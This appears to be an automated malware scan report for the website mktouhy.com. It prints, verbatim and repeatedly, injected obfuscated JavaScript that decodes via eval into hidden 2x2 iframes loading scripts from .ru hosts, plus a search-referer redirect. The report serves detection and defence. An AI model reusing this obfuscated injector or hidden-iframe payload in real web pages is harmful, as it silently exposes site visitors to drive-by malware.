Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mktouhy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mktouhy.com/ | 200 OK Content-Length: 4072 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=eval;n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,363,428,113,202,354,388,120,92,342,468,47,198,333,468,110,232,153,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://mktouhy.com/about.html | 200 OK Content-Length: 3943 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=eval;n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,363,428,113,202,354,388,120,92,342,468,47,198,333,468,110,232,153,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://ykqevax.ru/count3.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://mktouhy.com/register.html | 200 OK Content-Length: 5773 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,312,484,113,234,309,456,121,92,342,468,47,198,333,468,110,232,156,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://mktouhy.com/contact.html | 200 OK Content-Length: 3842 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,312,484,113,234,309,456,121,92,342,468,47,198,333,468,110,232,156,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://mktouhy.com/resources.html | 200 OK Content-Length: 4530 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,312,484,113,234,309,456,121,92,342,468,47,198,333,468,110,232,156,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://mktouhy.com/includes/2007_w9.pdf | 200 OK Content-Length: 52274 Content-Type: application/pdf | clean |
http://mktouhy.com/test404page.js | 404 Not Found Content-Length: 2090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,312,484,113,234,309,456,121,92,342,468,47,198,333,468,110,232,156,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://mktouhy.com/includes/ClientAcceptance2007.doc | 200 OK Content-Length: 33280 Content-Type: application/msword | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://mktouhy.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mktouhy.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 14 Jan 2015 07:00:18 GMT Location: http://aindarkiri.invisitred.com/url?sa=D&source=web&cd=11&ved=037hcxt0h&url=http://mktouhy.com/&ei=2ZEuc6jO46m8rI2Jx1w09pq1oQ==&usg=45-Zw2n2axRwciogALAEM8&sig2=CXq9O5DhEfQTWyOje9nIWS Server: Apache Content-Length: 395 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: nSq=1; path=/; domain=mktouhy.com; expires=Tue, 20-Jan-2015 22:46:18 GMT | suspicious |